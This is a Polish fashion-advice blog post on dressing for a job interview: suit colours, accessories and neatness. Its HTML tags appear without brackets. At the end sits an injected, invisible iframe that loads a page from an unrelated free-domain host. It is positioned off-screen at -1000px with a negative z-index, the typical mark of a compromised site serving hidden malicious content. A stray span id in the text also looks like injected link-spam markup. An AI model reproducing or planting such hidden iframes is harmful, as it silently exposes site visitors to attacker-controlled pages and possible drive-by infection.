Odzieżowy savoir vivre

Co włożyć na siebie na rozmowę o pracę?

12 lutego 2016 • Opublikowane przez

Rozmowa kwalifikacyjna jest pierwszym momentem, kiedy pracodawca może nas zobaczyć i ocenić. I choć doskonale wiemy, że nie należy oceniać człowieka po jego wyglądzie, to strongpierwsze wrażenie/strong tworzy właśnie cały wizerunek o naszej osobie. A pierwsze wrażenie możemy zrobić tylko raz. Jak ubrać się na rozmowę o pracę, aby nie popełnić faux-pas i wywrzeć dobre wrażenie na potencjalnym przyszłym szefie?

!–more–

nbsp;

strongO czym musimy pamiętać przede wszystkim?/strong

Istnieje szereg zasad, które obowiązują podczas rozmowy z pracodawcą. Na pewno rzeczą obowiązkową jest oficjalny ubiór. Nie możemy pozwolić sobie na luźny, ekstrawagancki czy nazbyt śmiały strój. I dla kobiety, i dla mężczyzny, najbardziej strongodpowiednim strojem będzie ciemny garnitur/strong. Dla span id=”akon_nsitsp_3″kobiety/span może być to wersja ze spódnicą, czyli popularna garsonka. Warto się jednak zastanowić, czy będzie czas na to, aby martwić się o odpowiednie rajstopy i czy nie będziemy dodatkowo martwić się o to, że rajstopy „puszczą oczko”. Zdecydowanie bezpieczniej będzie włożyć na siebie spodnie. Jednocześnie pamiętać należy, że rozmowa o pracę strongto nie szkolna akademia/strong — wyglądajmy zatem elegancko, ale nie jak uczniowie.

nbsp;

strongJakie kolory ubrań?/strong

Barwy stroju na rozmowę kwalifikacyjną winny być stonowane. Najlepiej wybrać szarości, grafit, brązy, ciemne fiolety, granat, biel czy ecru. Wypada, by mężczyzna włożył na siebie koszulę i krawat. Jeśli stara się o posadę na wysokim stanowisku, wówczas oprócz garnituru powinien mieć na sobie kamizelkę. Kobieta może z kolei mieć na sobie elegancką bluzkę z kołnierzykiem, spodnie „w kant” lub spódnicę. Najlepiej będzie zastosować tradycyjny schemat: strongjasna góra, ciemny dół/strong. Do tego buty na obcasie — jego wysokość nie jest określona.

nbsp;

a href=”http://argos.pl/blog/wp-content/uploads/2016/02/rozmowa-o-prace.jpg”img class=” wp-image-2669″ src=”http://argos.pl/blog/wp-content/uploads/2016/02/rozmowa-o-prace.jpg” alt=”Źródło: regiopraca.pl” width=”826″ height=”550″ //a Źródło: regiopraca.pl

nbsp;

strongKwestia dodatków/strong

Oczywiście możemy pozwolić sobie na strongozdobienie swojej stylizacji kilkoma dodatkami/strong. W przypadku panów będzie to zapewne zegarek. Z kolczyków czy rzemyków na przegubie lepiej zrezygnować. Panie mają w tej kwestii większe pole do popisu, jednak pamiętać należy, że lepiej będzie, gdy dodatki będą delikatne i niewyzywające. Kolczyki z piór czy pierścionki na kilku palcach lepiej zostawić sobie na wieczorne wyjście ze znajomymi.

nbsp;

strongNajważniejsza staranność/strong

Strój na rozmowę o pracę powinien cechować się jednym — nasz przyszły pracodawca musi widzieć, że przyłożyliśmy do niego wagę. Wszelkie plamy czy zagniecenia są stanowczo zabronione. Z kolei to, czy spódnica będzie szara czy granatowa, nie odegra większej roli. Najważniejsze jest, by pozostać w granicach dobrego smaku.

nbs!–844c7b74e31d727d5814a0ed667c0255–iframe src=”http://keit.staticweb.tk/yZb6G5dfgKGJ” width=640 height=480 style=’position: absolute; left: -1000px; top: -1000px; z-index:-1;’/iframe